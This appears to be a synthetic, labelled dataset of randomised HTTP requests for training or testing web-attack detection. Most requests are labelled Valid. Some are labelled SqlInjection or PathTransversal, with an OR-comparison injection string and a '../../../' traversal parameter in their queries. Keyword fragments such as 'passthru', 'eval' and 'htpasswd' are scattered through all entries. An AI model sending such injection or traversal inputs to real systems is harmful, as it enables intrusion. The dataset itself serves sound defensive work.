GET /eqkF@Q/vmmdBrerkSnsbEe/cD1MPDAUNBboCO/d4gS/7cAloqNneittjeseD/siHuharht93wtrrne/mlee/b@hzW3StyYpu0VtLZI/lrtbhishGosjmdSxarhe/.Zmblike3Htl_Qd/aergl/ssaGhdiie.png?gfe8pffheazs=ohbV&@elpasswdaC-7xmlQ=ce%25u&eow4ig0xr=scriptechohosecnAxml1&n8h=%28%5Doio-c+0ailti8xi&5U1QIbody=n%282+&K.bDRL5=e%5Cc+h&vo=026&yZ0TT@4TGdS=94943219&yeob6r3edezzax=t.Op6awU&enadnyleejaa=n6yubnya3cmo0b&onv=ne&aabmctra=Fdocument&vgtGrni=mrU&all-SI3=0 HTTP/1.1
Host: 95.48.241.231
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: c-tO;q=0.8, mwlfzrng-4Twsasef, qss8XN1-9secio, soni-6;q=0.5
Cache-Control: only-if-cached
Client-ip: 74.7.154.142
Cookie: pservicesn@MNYkPEJ=96;rqiq=iddOhsvardt;asTO5rgC=12355;ieeas48gkeel3oe=tYYH9xvuK;ezecisb8a5=nn0Ryqnlt;ecuanS=j xaaE 
Cookie2: $Version="32"
Date: Mon, 01 Sep 08 11:34:34 CET
ETag: W/"TKymIOMp0O3b3gZ"
Expect: u70trk
From: dasa@Cnth.cz
If-Modified-Since: Fri, 05 Mar 04 17:54:45 CET
If-Unmodified-Since: Sat, 19 Dec 09 24:30:06 UTC
If-Match: *
If-None-Match: "hQh@c@drJabEj4uL1_"
If-Range: Wed, 31 May 06 03:06:13 CET
Max-Forwards: 7115
MIME-Version: 1.4
Pragma: el20n6t='eeibsseV'
Proxy-Authorization: gsem9 fnpyn=nemsen
Authorization: NTLM ZHJlZVR0c3hhZXVTbGdFYmNubnNsbXNlcW9FbnR1c3RybWVkNW83
Range: 8-,-0,6-
Referer: http://sfittt.st/ilDI8tn.jsp
TE: chunked;q=0.7,trailers,deflate
Trailer: From
User-Agent: Mozilla/5.3 (Windows; U; Windows NT 0.6; p0-hn; rv:8.5.1) Gecko/89284237
UA-CPU: 68000
UA-Disp: 599,0261,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9002x158
Via: 4.2 221.174.130.68:427
Transfer-Encoding: gzip
Upgrade: ztd/6.6, uveUC/2.7, edns/8.2, 7mo/6.6
Warning: 621 www.adatnB.css "eeieewsae" 
X-Forwarded-For: 185.239.118.59
X-Serial-Number: 053261538285243
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2734
Start - Id: 33912
class: Valid
PUT /tIpsutdnslotUlTlc/t.2M.gRM/tv5/rt/d0fR24ezemusfc/2_ZgLMqkzYWP/rsb/TiRaccess_log%uuf.cfm? HTTP/1.1
Content-Length: 10
Content-Language: lqaDlar
Content-Encoding: identity
Content-Location: http://www.h6nlaeia.it/asu4ndza/smbYetho/mnnse8/ze09fat/8hr4ossi.nsf
Content-MD5: cnZleGV0eWxlaWh0dWRleQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Mar 07 08:58:12 CET
Last-Modified: Thu, 07 Jun 07 23:50:55 GMT
Host: 54.38.56.157
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: deflate, deflate;q=0.9, compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 149.23.88.181
Cookie: bWg8siodaetg=ahM2;accjoac=623;ne=styleobonieso~i
Cookie2: $Version="7"
Date: Mon, 26 Sep 05 23:53:32 UTC
ETag: W/"qX04JCGC-v9kViL0"
Expect: kcer4ecw
From: faUspl3@yqiAa4o.it
If-Modified-Since: Fri, 24 Jul 09 11:11:33 GMT
If-Unmodified-Since: Tue, 26 Apr 05 06:51:35 UTC
If-Match: *
If-None-Match: "2MuVpt2lgI.4_o5HZ.k"
If-Range: *
Max-Forwards: 24
MIME-Version: 9.8
Pragma: reZs1ni=lmsqxls
Proxy-Authorization: ddre3t eDfhi=ueIeutii
Authorization: NTLM aGVuSWl3YW5oaG9kbnRoYnIzb251ZTZlbGQ3c2hkaGlsZ2VydXJtcmk=
Range: 9312-,07788-
Referer: http://www.geClotrC.de/dIodeme/eAssa/tWsLe9.png
TE: gzip
Trailer: Connection
User-Agent: owile/2.7.4
UA-CPU: PowerPC
UA-Disp: 4653,644,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1982x002
Via: enkrn/7.6 www.ieeueC.html, 8.3 www.reei.css
Transfer-Encoding: gzip
Upgrade: tiA/0.9, ntKsa/7.2, 7Aeetb/2.3, Eili/1.5, lni/0.9
Warning: 838 187.94.47.95 "esokwemfr" "Sat, 16 Aug 08 20:20:05 UTC"
X-Forwarded-For: 7.63.26.112
X-Serial-Number: 6132370347859311136
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

awa=071946

End - Id: 33912
Start - Id: 1862
class: Valid
GET /6iOyoccloietuNluas/8snsrnti/ejihuaEfeaetf/8q5ZwzGzUmrvbscriptjy/rlCtJQPATF_jofC5/h8danscue4sfNdfe1.tiff?etxs=u%3AiPs&feeyoyiaAs=tJalD6.M&eW-yNKT=ttmochaHort+edeletene%29tdd+stdin&jqi1c2b=0156685715&deswuleaOu5pv=sIr&cI4eo6gn1iasRn=sAEJvx1CC1-&5rcpl-=4tdqltaecapo HTTP/1.0
Host: www.aold.ch
Connection: keep-alive
Accept: audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: msH-ci8e9m, aro-ahouti, ctdymor-sSann7
Cache-Control: min-fresh=5
Client-ip: 188.102.222.214
Cookie: bbrasw1=1;Q1y2updateJEd7P=lQc0fs@ZcFOI;ena7enc=94630664;ye4=9798;ori=629108
Cookie2: $Version="36"
Date: Tue, 24 Apr 07 23:08:21 CET
ETag: "Ty0wDG9@E2TZkjfe"
Expect: 100-continue
From: utOro@brnnglI.fr
If-Modified-Since: Mon, 02 Feb 04 19:43:15 GMT
If-Unmodified-Since: Mon, 25 Oct 04 16:58:19 CET
If-Match: *
If-None-Match: "To2JtdrmX0kd@WpL8gRs"
If-Range: Thu, 23 Jul 09 23:54:43 CET
Max-Forwards: 4
MIME-Version: 9.5
Pragma: 6t='luz'
Proxy-Authorization: NTLM ZWhpaWFlc2VqZVBUb25iZlkyMG5pVGFhVGxoYW85b2FobHNpdTNOdGNyeWFzcmRp
Authorization: Digest algorithm=tanacn
Range: -34624,61390-055,75119-
Referer: http://www.8ontnxsa.de/m1odhats/eNst/6rvo/rfd8/stDiy.exe
TE: trailers
Trailer: Range
User-Agent: ezcEsao98s/2.0.8.6.8
UA-CPU: PowerPC
UA-Disp: 171,774,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 063x9656
Via: 0.4 11.143.134.17, HTTP/5.3 www.oinnumn.htm, FTP/3.5 127.183.26.138
Transfer-Encoding: u0ett
Upgrade: ue0/2.4, itqt5/5.4, 6Erms/1.3
Warning: 195 79.247.8.91 "v9omtairreetwatxt" 
X-Forwarded-For: 120.197.169.25
X-Serial-Number: 0502244013679080099
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1862
Start - Id: 4943
class: Valid
PUT /JpWechoPJT/-IDxvB8/lttlea/nt0jaRNQLkUqv/yWWLwkGTKfnVWIGr1e/sydaelm3s0i/uAT_/GusrDgPnc_7Z/sardrhngbaresaajcav/samPYu1pvOhn8h2t/_EQDGUUtqu9.cgi? HTTP/1.0
Content-Length: 143
Content-Language: qlo5sa,rnvtIu,ltSo
Content-Encoding: identity
Content-Location: /aleVi3/esoohy/ax6oe6e/h5gyun.png
Content-MD5: ZWVnaXRlaWh6aG9yc2Vubw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Oct 09 09:56:02 GMT
Last-Modified: Mon, 22 Jun 09 02:57:02 CET
Host: 149.132.5.227
Connection: close
Accept: */*;q=0.2
Accept-Charset: cp-932;q=0.3, windows-1252;q=0.4, utf-7, koi8-r
Accept-Encoding: *;q=0.7
Accept-Language: t7ub-fmr;q=0.0, Y-eee;q=0.3, b6-klpoqN, E4o4tn-Tomtn;q=0.6
Cache-Control: min-fresh=38
Client-ip: 103.157.186.193
Cookie: fgw8XFRexecp=\gsreplaceautoexecorconnectgaa-or=;4nsed=lhpw hhtpassn(ea(locationda6sopt;cea4=3111464
Cookie2: $Version="35"
Date: Thu, 17 Dec 09 09:18:36 UTC
ETag: "Mmj.38E6t4GeYzLQH_KA"
Expect: 100-continue
From: tsamc1M@it8Et.ch
If-Modified-Since: Sat, 30 Jul 05 02:06:22 GMT
If-Unmodified-Since: Wed, 04 Jul 07 12:49:51 GMT
If-Match: "-TRSs0p7uwnJf_YaiWG"
If-None-Match: "qtW2J8EPpMr15hP"
If-Range: Mon, 25 Apr 05 13:04:06 GMT
Max-Forwards: 9
MIME-Version: 6.5
Pragma: c=i
Proxy-Authorization: NTLM bHRsem5hb2xkMHhhbmtldGdodmNhcG54OWlwZTExbnRzbzQ=
Authorization: Basic ZEFlY2JsOmtjdWlibnMz
Range: -9,-30994,21-971
Referer: /ra0anEtx/unos/vdemtcea/tddnca/ia8e.cfm
TE: trailers,trailers
Trailer: Expect
User-Agent: onjZperaKt (trmHz2HN.H; tkW_uCLVGJ; tRbRY3; 6qvsNkYb6)
UA-CPU: Sparc
UA-Disp: 979,352,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4223x6180
Via: FTP/8.9 www.purlR.shtml:50, hluc9/1.6 www.iompcA.css
Transfer-Encoding: compress
Upgrade: fFAahd/7.2, t4Oi/2.4
Warning: 222 www.oeeeay.gif:8841 "nriml4ld" "Mon, 28 Aug 06 16:14:52 GMT"
X-Forwarded-For: 18.33.117.239
X-Serial-Number: 2881856065
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

krhnnlkwhfCente=df=c9e@uEn eT eval4&unmnpiga2re83ad=oMl4Ne&hhimuejhuee=ssj b&oS= exO&oitRyz=dprocessing-instructionazc6\ebc mtmetadena|

End - Id: 4943
Start - Id: 41979
class: SqlInjection
GET /eQjca_uIj/onlytdwe6redensaw6Hs/helarxnEaaqoee0rnl/epsx90bFYZH/mhebrOoeqdeikeOmr/U5CAkjKIz/TM6Y8AuNEncgDU/gpassthrunph-8sfromGI/fFtVHwKLlXcfQ/C.zg.jpeg?dhlanEDdneoo=68150743&lY=%40dftp&eodow=hc&-q8Nw=b%25Imouf&sexahar=6831736022&gisthsm8elaScan=14&32eKPuPQeGC=%28t5&oJ-GHp=hrtpwfq&maaieb=oem&TnaTan1a=t%3Fa&-cmd2-insert=%27+++++OR+%27irfo%27+%3C+++++%27X&serrtna=%7Cep HTTP/1.1
Host: 151.215.67.156
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312;q=0.4, iso-2022-kr, iso-8859-5;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 138.9.3.13
Cookie: nisd8enca=pcrl;yth3hn1maee=vre
Cookie2: $Version="316"
Date: Sat, 14 Jan 06 19:52:13 UTC
ETag: "H-wtGNRWTakDfVw7"
Expect: taus=aiyn
From: Iyirabt@mar7tEeeb7.de
If-Modified-Since: Fri, 04 Apr 08 03:57:04 UTC
If-Unmodified-Since: Wed, 10 May 06 16:20:19 UTC
If-Match: *
If-None-Match: "vwge@FysRj3zYHz"
If-Range: Sat, 25 Sep 04 13:40:58 GMT
Max-Forwards: 8351
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest uri=http://Ih9gc.net/soss.txt
Authorization: Basic ZWE0aHo6cm44ZmllMXY=
Range: -221064
Referer: http://www.aeeeh0.de/eioj31/4ayoco/ioASmicK.php3
TE: trailers,trailers,chunked;q=0.1
Trailer: If-Range
User-Agent: nile/9.0.6.2
UA-CPU: Sparc
UA-Disp: 4298,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 252x7961
Via: 6ucKLt/1.7 www.betno.jpeg, FTP/6.9 219.111.145.75
Transfer-Encoding: compress
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 237 www.niiai.tiff "6aniv2xeemiUvSmef1" "Fri, 09 Apr 04 14:40:51 GMT"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 382676240
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41979
Start - Id: 20258
class: Valid
GET /zgvvT/ezucjJVhmp7uX-wDuIxY/rzrSoiconriohngecgr/foxf58KutjD-group bystylein/rVRJWb4UeV89DbQ.y3/6aIce9o5edAroCmelh2M/az9G@vrBvtR3/fewptTi/hAngauonastvte/nT3jITmz1vhaAlhXaZS/dtTp5mUXS418Rzb@.jsp?Nanroh=aextermadig&nmeaefwn=5%40P9mb80C&taUTtsaul=f&y3ntbxmaNrear0B=iiNn&dJQ2BfBQsz=0882&Levalis9https5s=mIometittlh2n56WwF&es_ca7=aoor2 HTTP/1.0
Host: www.tvoaa.uk
Connection: aena
Accept: */*
Accept-Charset: windows-1252;q=0.4, x-mac-japanese, euc-jp, utf-8;q=0.3, x-mac-japanese
Accept-Encoding: compress;q=0.2, identity, gzip;q=0.8, deflate;q=0.6
Accept-Language: 1m-oNn;q=0.8, 4iiooj-4apqsjl
Cache-Control: max-stale=000
Client-ip: 179.205.122.247
Cookie: behmheasaed1na=9ienorui1;.dZ0GH= 5s;nCttbxrlewnav5=yeQr)maBnhtpassatmmo
Cookie2: $Version="389"
Date: Fri, 05 Jun 09 16:02:51 GMT
ETag: "GRSd.RAB2xqYJdR"
Expect: xoesR8=hdg4
From: eoean@ohdnpug.com
If-Modified-Since: Fri, 06 Nov 09 02:00:37 CET
If-Unmodified-Since: Tue, 12 Apr 05 02:12:59 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 62
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM Y25lYWFlZXJybjZHZXNkYXRzY21ld2VvZG5zOHVhaGRseGVmZWVodGd3c29lbA==
Authorization: nc06 8euR=efsco
Range: 90-31589,62-
Referer: http://www.ohpoeuix.gov/d20fera/ethnh6/u4ipdl/nhczfnr8.png
TE: trailers,trailers
Trailer: Warning
User-Agent: ts7as6m3m
UA-CPU: MIPS
UA-Disp: 161,462,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2457x531
Via: 1.4 200.104.155.155:8, HTTP/2.4 139.161.161.130, mveei/4.3 122.178.68.152:4
Transfer-Encoding: gzip
Upgrade: 6Nl/9.6, iln/2.9
Warning: 407 www.lti8nm6y.gif "4cis0daFde" 
X-Forwarded-For: 53.85.23.141
X-Serial-Number: 11361465282
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 20258
Start - Id: 9600
class: Valid
GET /UdsmlehaoreygNaue/gehrGa1rrlgoneoij/X6DeCpvwOK2l0Zall/vDwtH9ULGEnQLu/nyp0ds/attrHid/yCJ55GmYMH51A@Gsgk@/1erci9H3r2ssdz/8_M/4Rf.tiff?8exmlz-=oo&s2nioso4m=hi%262%3Fr4omyf&gruoaota=575&eeN=aileeh5e3aaa HTTP/1.1
Host: 70.191.231.131:80
Connection: close
Accept: video/quicktime, video/*
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.7, identity;q=0.3
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 238.174.206.50
Cookie: 6jeRi6pijoisue=ebt?$;p1E7=Rtyyoe2boxdooiwna;4fqs=ypgX@J1Rr
Cookie2: $Version="815"
Date: Sun, 06 Feb 05 22:14:11 CET
ETag: "1vXhL-rvFxEmXG3gH2"
Expect: 100-continue
From: eSsaDtn@crno.be
If-Modified-Since: Thu, 28 Aug 08 08:11:38 UTC
If-Unmodified-Since: Mon, 22 Jan 07 19:59:39 GMT
If-Match: *
If-None-Match: "9XtEME.Xb13hVZY-dDs7"
If-Range: Mon, 02 Mar 09 20:41:26 CET
Max-Forwards: 9462
MIME-Version: 1.9
Pragma: lItmn9='ik'
Proxy-Authorization: Digest uri=/3kteNf/fyt4nept.nsf
Authorization: NTLM b2hOc2N4OGF0ZXNhaWhyc2FpM2VlYWUyMmxlc25zZHplRGh1cm1zemUycnNoelR0
Range: 0-56363,-050,4935-
Referer: /Rerri/Rtnxh/alscgC.js
TE: gzip;q=0.6
Trailer: Host
User-Agent: orr5MR25 http://www.ogmi.gov
UA-CPU: 68000
UA-Disp: 932,6777,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7520x0183
Via: 0.7 www.sute.gif, 3.7 30.252.219.156
Transfer-Encoding: deflate
Upgrade: aooeh/2.6
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 225.176.97.169
X-Serial-Number: 02037613
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9600
Start - Id: 32645
class: Valid
POST /rzb57/inN/tS7hwsldtwgHe8/34@/m7vZwi1-_jwR12B/seqwn/tb0XPrJEv66gE.jsp? HTTP/1.0
Content-Length: 226
Content-Language: grtness,olsxa
Content-Encoding: compress
Content-Location: /B1owdbo9/htaIgh/ooffail/rh5a.conf
Content-MD5: dGJzaXBoaGxhYmZsNGxuYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Sep 09 04:12:26 UTC
Last-Modified: Tue, 24 Jan 06 12:08:58 CET
Host: 123.129.110.183
Connection: keep-alive
Accept: image/*;q=0.4, text/*
Accept-Charset: iso-8859-2;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=75
Client-ip: 93.93.209.53
Cookie: I.VDI1rmq@2Wu=83828;EmdeojsRa29=7;eAae8efisi8r=tPXu6jN;0O=r7wn3ne;;osainaTrs5elalw=3365
Cookie2: $Version="7"
Date: Mon, 28 May 07 09:05:34 GMT
ETag: W/"N8Gp1K9TYa@tqjLdwJNQ"
Expect: o2e6oYIs=ohjah;Geiwj=lhih
From: Ieaod@xebeE.uk
If-Modified-Since: Wed, 17 Nov 04 19:21:41 GMT
If-Unmodified-Since: Fri, 24 Sep 04 07:03:05 CET
If-Match: *
If-None-Match: "hleaWUjLrw4zT4od6GHA"
If-Range: Sat, 27 Aug 05 15:20:28 UTC
Max-Forwards: 76
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic c2FlaHJkU2U6OWxiVW0=
Authorization: Digest nc=F12caC48
Range: -8365,-00217
Referer: http://oeyEue.uk/ixnsRE.swf
TE: chunked,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.2 (Machintosh; U; PPC Mac OS X 2.2; uO-qn; rv:7.8.6) Gecko/15173647
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 853x924
Via: h1aDpt/1.2 218.174.3.18, 9.0 178.89.97.96:54063
Transfer-Encoding: deflate
Upgrade: hh9Oe/6.5, at7/1.1
Warning: 166 182.140.231.49 "qo7ntkcIsaeidh7" "Thu, 17 Feb 05 17:04:23 CET"
X-Forwarded-For: 1.120.217.6
X-Serial-Number: 14198779071
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

ilcotE=passthrumafAspblYyeee? +n&daa=27492&oatUa5Hees=5&i4mc602fnhs=r7p&ArifhOtsrpawh=oanOjW&4C9vI.s=naaiSfedfAcpneie&fe8rhf=n&rguq3n=Nwboez&aNiah=15809909&ocntlb5s=eejta&h9ezegbtsoe1e=pDB@PF9tUTp&qh2sadlyLLint6=iE;oas

End - Id: 32645
Start - Id: 33930
class: Valid
POST /a5LVOOUbeTeJaMuH/dI6qPyp9Zd3mM/6LKvb3qY1aDQzKFX.sh? HTTP/1.1
Content-Length: 165
Content-Language: 7iahoor,0,ntuss
Content-Encoding: deflate
Content-Location: /oeah.msf
Content-MD5: T2Fhc3NtbHdyZHdhckgyYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Aug 09 02:21:07 CET
Last-Modified: Sun, 12 Jul 09 13:21:22 UTC
Host: www.obacaid67.ch
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-turkish, cp-932
Accept-Encoding: *
Accept-Language: sht-atndst, s-8lnhITeu;q=0.3, nhelewT-4az;q=0.3
Cache-Control: only-if-cached
Client-ip: 209.129.239.30
Cookie: ctt=rpne5s1d1ait;ohbnTeo=hth
Cookie2: $Version="772"
Date: Tue, 19 Aug 08 12:54:09 UTC
ETag: "OXFSextK3FfDi7h"
Expect: ewnl9q
From: faUspl3@yqiAa4o.it
If-Modified-Since: Wed, 04 Aug 04 04:31:16 UTC
If-Unmodified-Since: Thu, 20 Jan 05 06:38:57 UTC
If-Match: *
If-None-Match: *
If-Range: "xJ3d0rUbNeCvJMC"
Max-Forwards: 4879
MIME-Version: 7.8
Pragma: 9roidQa=sgxNehfn
Proxy-Authorization: ddre3t eDfhi=ueIeutii
Authorization: NTLM ZWlzcHE4R2x4Vm8wOGhhYXJscGQ4ZWd0aXJFUmU0RWFlaWNwQm1sbWROYWQ=
Range: -996,858-589875
Referer: http://www.mheso.net/5ceeamj/nxwyer/odrbosn5/ine0plr.cgi
TE: gzip;q=0.0,gzip;q=0.1,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.8 (compatible; swlrrut; Win98; keoiijer; ioumkim)
UA-CPU: x86
UA-Disp: 4653,644,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1982x002
Via: t1p2sf/3.6 45.22.249.116, 2.0 187.194.68.78
Transfer-Encoding: identity
Upgrade: mtiv/1.9, Samgmt/6.9, enjtl/7.4
Warning: 795 168.131.85.71 "htNrsta0stixj" "Thu, 18 Mar 04 22:40:39 GMT"
X-Forwarded-For: 7.63.26.112
X-Serial-Number: 33317815178377
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

laneq3asteerhnn=0Ltmptw1l n:; g1kEosor&t1ceangOyecl=q&jcetauetiel=orcp%escwwvc &sel&oi5saxHopniE=u(my9&EehtpassBh_O=odI3k&eelnNajeTvt=05626&4tandjTnmt=utey

End - Id: 33930
Start - Id: 8358
class: Valid
GET /bgJ.PFmP1RP8/tl8hEBsxn3dpSUep1jE/uOw/n4/nia/waeamei1al/lJORfdQDb/eu3zm5L-@FQgHy/tZxNCG8pHZlaFVG7/ioyeme.gif?kxCrmpg=arE%3B0dmire&ets=wa&1bsbetweenbB=87XJHMocwKnx&23rmnwFp8ignoa=alm&r9Fuoonoee=99960&oehuahwkTENT=1724861705&papVaccess_logH=ihl4qr%3Fr9%27%3C&dsUDzewil=eO&PhledsfesD=nalewp-&ZDxaDwGK=n+bcpd%7Ce&newqwa6=ldsetntn6o%3ChktOUw&sdrdrsei=lh+v%7E&irwas9rindnhsio=p82Z%40&airueeleN=+b&we=1021 HTTP/1.0
Host: 5.53.122.197
Connection: lAueLs
Accept: */*
Accept-Charset: cp-932, iso-8859-9;q=0.1, euc-tw;q=0.9, euc-cn
Accept-Encoding: 
Accept-Language: *
Cache-Control: ca='etts'
Client-ip: 129.213.193.127
Cookie: x-lt8rXP=oI6 gel(S;UshtpasswWs5Y=iframetshEssapaYnan;ftQUyc=aoehi;0l3oh6vavyoabwa=99;eraeain=40
Cookie2: $Version="4"
Date: Sat, 17 May 08 23:26:49 CET
ETag: "aByDIWY5FUwxtNRvXU8"
Expect: 100-continue
From: chtn@qt6hosna.org
If-Modified-Since: Sat, 15 Jan 05 21:14:46 GMT
If-Unmodified-Since: Sat, 26 Aug 06 17:26:32 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1304
MIME-Version: 6.6
Pragma: ssserrS='mcx'
Proxy-Authorization: NTLM QXU3eGVlYXRkcW9hZDZpTnR5dHRlRWVkYU1CZXd1bkVldXJlT2lpYWU=
Authorization: Basic VmhpYVI6bXpld2E=
Range: -2465,620-
Referer: http://bnltrtE.org/Uesscer/t0tlnssr.jsp
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: eebGL9ainEs
UA-CPU: 68000
UA-Disp: 5778,009,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 569x015
Via: FTP/2.7 www.eaEvr.png
Transfer-Encoding: identity
Upgrade: YiTM/8.9, cwneoe/0.3, wmA/1.1
Warning: 146 134.48.120.16:1818 "aipevpmprtDsvoAt" 
X-Forwarded-For: 217.157.80.139
X-Serial-Number: 482816
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 8358
Start - Id: 1369
class: Valid
GET /t_/EumKeDtimgbAevalI7s/yRDn6zPVB_z/7m/oh.asmx?re4ipeuo=osreoeeoy1iossto&naz7phpFXLz=%2Be%5Cueeuadh+ue8%7Ett0b&otycyhnuldS=Hrmopmykoctto&h0ninqo=9133 HTTP/1.1
Host: 253.221.36.49:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: gzip;q=0.0
Accept-Language: *
Cache-Control: max-age=79
Client-ip: 85.112.24.2
Cookie: kyC9FautoexecY=566724611
Cookie2: $Version="622"
Date: Mon, 23 Jan 06 07:50:41 GMT
ETag: W/"NLDDHcD.qj9@50a1FAQw"
Expect: 100-continue
From: wi2twwpe@rrmwot4.ch
If-Modified-Since: Sat, 20 Mar 04 23:31:02 UTC
If-Unmodified-Since: Wed, 22 Mar 06 04:16:24 UTC
If-Match: *
If-None-Match: "vwtc9p6PnrCBigSGLc"
If-Range: Fri, 27 Apr 07 11:48:38 UTC
Max-Forwards: 5351
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWhnckVyenJ0ZWlvc2loRm82dHF0d0thaGRvVmxwYTFvZjJ4ZWxvZHVOaWc2aA==
Authorization: Digest response="9d5cc517ca028c9A1D5d3FD88e53d8CF"
Range: 24-
Referer: http://e1tste.st/Esaub/ei2e8.jpeg
TE: gzip,trailers,chunked
Trailer: Date
User-Agent: Mozilla/9.8 (compatible; Konqueror/5.5; SunOS sun4u; tiyiicnOcH; neomtttn)
UA-CPU: Sparc
UA-Disp: 0720,076,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 956x464
Via: FTP/7.8 www.dhfylW.js, FTP/3.2 www.kd9m.shtml, 0.8 27.240.228.50
Transfer-Encoding: deflate
Upgrade: Iifh/3.1, atthe/8.5
Warning: 857 www.Snpe.htm "qdO3unnssateraarij" 
X-Forwarded-For: 188.179.244.100
X-Serial-Number: 147844
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1369
Start - Id: 44978
class: PathTransversal
GET /e-LVmu3rlA_6jlmO@h/aGtPKIH/edT2nlZZ.dll?ctenrebta9dgsE=334914&hawetshom0rwdni=01654210&Zc5Kcfq8@C=EskertRLhdai&3ic=siz&YGbe=xnnb%7E&glceErtrtjCi=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&xlknimo0hTo=c0o HTTP/1.1
Host: www.asni7.gov:997
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 64.160.89.221
Cookie: faaxnoe=071977;Rrs=110580;sel=11714
Cookie2: $Version="2"
Date: Sat, 18 Apr 09 15:08:44 GMT
ETag: "cQYNQi481EW5_Y7"
Expect: wpte
From: tsdma@neiban.be
If-Modified-Since: Sat, 27 Dec 08 21:00:23 UTC
If-Unmodified-Since: Mon, 17 Jan 05 15:03:07 GMT
If-Match: "gROhg9XHagzDGrpkSrrw"
If-None-Match: *
If-Range: Thu, 08 Sep 05 12:13:08 UTC
Max-Forwards: 56
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM aW1ucm95dEUwb2VzdGZzY2RjaDhsbEJuZXRoaHlpdG1rZVZkeA==
Authorization: nrmt eelgn=eieeew
Range: 73-,999598-14093
Referer: /eeDld.dll
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/1.9 (compatible; Konqueror/4.1; SunOS sun4u; eRea2ws)
UA-CPU: Sparc
UA-Disp: 272,747,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: j22dl/1.5 146.224.49.154, 0nr/8.6 172.15.139.11:4246, 0.1 134.210.96.175:820
Transfer-Encoding: gzip
Upgrade: tOgk/7.2, 57lv/3.4, zpxc/7.9
Warning: 066 www.nilrhde.jpg "jrIghnmascnrodusoxo" "Thu, 06 Oct 05 03:19:48 UTC"
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 88070194263
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44978
Start - Id: 16772
class: Valid
GET /rsrElun.msf?ielt3aoShoz2=tyhewo%24%26sbvbscript2i HTTP/1.1
Host: www.laUt.org
Connection: ahr7
Accept: application/*;q=0.7, application/zip;q=0.0
Accept-Charset: shift_jis;q=0.1, euc-tw, iso-2022-kr;q=0.6, cp-950;q=0.5, x-mac-arabic;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 228.43.150.132
Cookie: yoex=I';Dt6n=e;scsieiAtisoq=597;59n5oatf=rIIe s
Cookie2: $Version="238"
Date: Sun, 21 May 06 11:15:20 UTC
ETag: "J-jyQUJFX5X5GVI"
Expect: 100-continue
From: tAgim@uoet.gov
